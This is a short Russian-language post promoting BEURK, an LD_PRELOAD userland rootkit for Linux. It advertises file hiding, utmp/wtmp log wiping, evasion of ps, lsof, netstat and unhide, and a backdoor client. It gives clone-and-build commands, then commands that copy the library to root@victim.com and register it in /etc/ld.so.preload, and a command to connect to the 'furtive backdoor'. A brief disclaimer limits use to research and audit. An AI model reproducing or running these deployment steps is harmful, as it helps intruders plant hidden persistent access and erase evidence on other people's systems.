BEURK – Экспериментальный Unix руткит |

BEURK – Экспериментальный Unix руткит

Обзоры

BEURK – это руткит userload preload для GNU / Linux, сильно ориентированный на анти-отладку и анти-обнаружение.

Особенности

◾Скрыть файлы и каталоги злоумышленников
Очистка журнала реестра (на utmp / wtmp)
◾ Контроль процесса и входа в систему
◾обход unhide, lsof, ps, ldd, netstat analysis
◾Поддержка клиентского PTY клиента

Установка

Сборка

 # git clone https://github.com/unix-thrust/beurk.git
# cd beurk
# make 

Установка

 # scp libselinux.so root@victim.com:/lib/
# ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload' 

Запуск

 # ./client.py victim_ip:port # connect with furtive backdoor 

Скачать BEURK

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

 

Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий